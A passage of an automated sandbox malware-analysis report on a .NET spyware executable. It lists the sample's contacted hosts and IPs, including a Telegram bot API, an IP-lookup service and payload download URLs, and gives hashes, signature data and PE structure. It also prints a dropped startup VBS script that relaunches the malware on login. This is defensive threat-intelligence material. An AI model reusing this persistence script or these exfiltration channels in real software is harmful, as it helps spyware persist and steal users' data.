89.40.31.232	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	false		high
https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI=	ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org	Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	false		high
https://github.com/mgravell/protobuf-neti	Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004440000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	false		high
https://api.telegram.org/bot	Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI	Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	false		high
https://github.com/mgravell/protobuf-net	Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cia.tf	Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.	Liphmahu.exe, 00000004.00000002.2209273870.00000000060D9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cia.tf/417440cce6502c1c57308172e9826dec.mp4HI	Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.129.178	cia.tf	United States	13335	CLOUDFLARENETUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
162.254.34.31	unknown	United States	64200	VIVIDHOSTINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562370
Start date and time:	2024-11-25 14:46:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ref#2056119.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@13/4@2/3
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 452 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Liphmahu.exe, PID 6104 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Ref#2056119.exe

Simulations

Behavior and APIs

Time	Type	Description
08:47:20	API Interceptor	79x Sleep call for process: Ref#2056119.exe modified
08:47:37	API Interceptor	31x Sleep call for process: Liphmahu.exe modified
08:47:48	API Interceptor	74x Sleep call for process: ishon.exe modified
13:47:39	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.13.205	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/
162.254.34.31	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse
	BankInformation.vbe	Get hash	malicious	AgentTesla	Browse
	Booking_0731520.vbe	Get hash	malicious	AgentTesla	Browse
	SWIFTCOPY202973783.vbe	Get hash	malicious	AgentTesla	Browse
	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse
	Urgent Quotation documents One Pdf.vbs	Get hash	malicious	AgentTesla	Browse
	Ref#150689.vbe	Get hash	malicious	AgentTesla	Browse
	Request for Best Price Offer.exe	Get hash	malicious	AgentTesla	Browse
	EQORY0083009.vbs	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DATASHEET.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://linktr.ee/priyanka662	Get hash	malicious	Gabagool	Browse	172.67.74.152
	mDHwap5GlV.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.74.152
	zapret.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	313e4225be01a2f968dd52e4e8c0b9fd08c906289779b.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	unturnedHack.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	https://sendbot.me/seuemprestimogarantido	Get hash	malicious	Unknown	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	0Xp3q1l7De.exe	Get hash	malicious	Remcos	Browse	172.64.41.3
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.24.198
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	packing list G25469.exe	Get hash	malicious	FormBook	Browse	104.21.49.253
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
VIVIDHOSTINGUS	sh4.elf	Get hash	malicious	Mirai	Browse	192.26.155.193
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
	BankInformation.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Booking_0731520.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	SWIFTCOPY202973783.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	m68k.elf	Get hash	malicious	Unknown	Browse	64.190.116.37
	Urgent Quotation documents One Pdf.vbs	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ref#150689.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	0Xp3q1l7De.exe	Get hash	malicious	Remcos	Browse	172.64.41.3
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.24.198
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	packing list G25469.exe	Get hash	malicious	FormBook	Browse	104.21.49.253
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.129.178 104.26.13.205
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.129.178 104.26.13.205
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.129.178 104.26.13.205
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.129.178 104.26.13.205
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.129.178 104.26.13.205
	WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.129.178 104.26.13.205
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.129.178 104.26.13.205
	https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4	Get hash	malicious	HTMLPhisher	Browse	172.67.129.178 104.26.13.205
	denizbank 25.11.2024 E80 aspc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.129.178 104.26.13.205
	lcc333.exe	Get hash	malicious	Unknown	Browse	172.67.129.178 104.26.13.205

Process:	C:\Users\user\Desktop\Ref#2056119.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	545600
Entropy (8bit):	5.127609143858781
Encrypted:	false
SSDEEP:	6144:xIl0ntJ/3UcPagobSxxIxx0xxxxxxxGsrw3IX7a6pls:mlutTGsLm
MD5:	225F257617CD3A58DB6D4CCC447F48E9
SHA1:	7C77E10D7CB01BC37B1F3CB21D7BA34BECF85857
SHA-256:	987697D24303E9BF9507F4F5835664BF32F61B4920A52D08B51F1E35951E1D8C
SHA-512:	5380826659FC91674B70BF178D5ACC5625B5CC3EFB8BE2906074DD54133D34CD7DCEDCE5F6CF8F705CB7BE1240A4371399023E2B89F01895AF0526D2A820E7B8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RDg.................>...........]... ...`....@.. ....................................`.................................T]..W....`...............6..@....`....................................................... ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc.......`.......4..............@..B.................]......H..........l.......M...................................................0...........s#...}.....s$...}.....(%.....}.......(.... A.B.(L...(&...,. w.B.(L...s'...z...(.....(....s(...}......{.....()...}......(....(.....:...($...(......0...........{....o.......+...+r.(....-...Y..+c..{.....(+...}.......(.......(....(,......3...(....&....Y(-.......(....-...{.....()...}........XY.....0.....0...........,..(....-..*..o.....T....o.....W3K..o.....W..,...+%.(.......Y.......(/.........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Download File

Process:	C:\Users\user\Desktop\Ref#2056119.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	80
Entropy (8bit):	4.7046271200716845
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5dfEHHn:FER/lFHIwknaZ5dfI
MD5:	2A3A1666420EFB8E93698256013F3AC4
SHA1:	404E55E1BC84328C413BDDD524D9DA1746CE9D55
SHA-256:	F3ECF1E59D22B070AB484D1447266710795722DE52CDF0556D092CB7B3E6A8D4
SHA-512:	6F2F7EB445981702E6CB40D94C0C9EF556C06F5D255474768F9551EFA6BFA37DB8BC428BB0FDB95A22BE4150EFBCBDFEEC643B44E1A30D586E24D9C46F2B90AC
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\ishon.exe"""

C:\Users\user\AppData\Roaming\ishon.exe

Download File

Process:	C:\Users\user\Desktop\Ref#2056119.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	545600
Entropy (8bit):	5.125935830889348
Encrypted:	false
SSDEEP:	6144:jvA6CCOPagobSxxIxx0xxxxxxxGsrw3IX7a6pla:r0TGsLs
MD5:	2C4DB8B396DFF48BA1E6AE44BD9AAE08
SHA1:	79319657ECFB6F4F7B13AB1E99DF278A53B7D101
SHA-256:	BE5CA82D327D53FC7EB8719289394CF37CC1F45D39429B8E527D600193B706E0
SHA-512:	0E6A30620C38DC796C67394B3C0884ABF342810C9E2FF7EC62550FB101F229F3E17F706009976844FE802716171813BC9DD7E8D6A4985D67B5DC31ACBAA5A583
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SDg.................>..........j]... ...`....@.. ....................................`..................................]..W....`...............6..@....`....................................................... ............... ..H............text...p=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc.......`.......4..............@..B................L]......H...........d............................................................0...........s#...}.....s$...}.....(%.....}.......(.... ..v(L...(&...,. ...v(L...s'...z...(.....(....s(...}......{.....()...}......(....(.....:...($...(......0...........{....o.......+...+r.(....-...Y..+c..{.....(+...}.......(.......(....(,......3...(....&....Y(-.......(....-...{.....()...}........XY.....0.....0...........,..(....-..*..o.....T....o.....W3K..o.....W..,...+%.(.......Y.......(/.........

C:\Users\user\AppData\Roaming\ishon.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Ref#2056119.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.125935830889348
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ref#2056119.exe
File size:	545'600 bytes
MD5:	2c4db8b396dff48ba1e6ae44bd9aae08
SHA1:	79319657ecfb6f4f7b13ab1e99df278a53b7d101
SHA256:	be5ca82d327d53fc7eb8719289394cf37cc1f45d39429b8e527d600193b706e0
SHA512:	0e6a30620c38dc796c67394b3c0884abf342810c9e2ff7ec62550fb101f229f3e17f706009976844fe802716171813bc9dd7e8d6a4985d67b5dc31acbaa5a583
SSDEEP:	6144:jvA6CCOPagobSxxIxx0xxxxxxxGsrw3IX7a6pla:r0TGsLs
TLSH:	13C46EADC2B8BCEBD41745B5DC76A9E1082BEF1854691E1A382A705325733933CB6C1F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....SDg.................>..........j]... ...`....@.. ....................................`................................

File Icon


Icon Hash:	7c64ccccd4e8f4cc

Static PE Info

General

Entrypoint:	0x415d6a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67445315 [Mon Nov 25 10:36:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/08/2021 20:00:00 10/08/2023 19:59:59
Subject Chain	CN="Aicho Software Technology Co., LTD.", O="Aicho Software Technology Co., LTD.", L=\u5357\u4eac\u5e02, S=\u6c5f\u82cf\u7701, C=CN, SERIALNUMBER=91320192MA1YED3N92, OID.1.3.6.1.4.1.311.60.2.1.1=\u5357\u4eac\u7ecf\u6d4e\u6280\u672f\u5f00\u53d1\u533a, OID.1.3.6.1.4.1.311.60.2.1.2=\u6c5f\u82cf\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	074C8CEBBDDB8C1AE41B66D468CC1A95
Thumbprint SHA-1:	7A4D4234CF32049903B9CDE0C0A0DA6D28398EAD
Thumbprint SHA-256:	027CC9D52DBEA32673B1D2BCD891F9E4E70EE720B6C5A6A8ACA7B6F9FB90B066
Serial:	078048AB9392D8BF9BA2B3A1B7098014

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15d10	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x6f388	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x83600	0x1d40	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x13d70	0x13e00	afe09f13af2410b957dba48e0d81dcb2	False	0.4660107114779874	data	6.0368777303787455	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x6f388	0x6f400	0afff6474adf3741af4b2ff6324ef474	False	0.19252765098314606	data	4.6618352677881845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
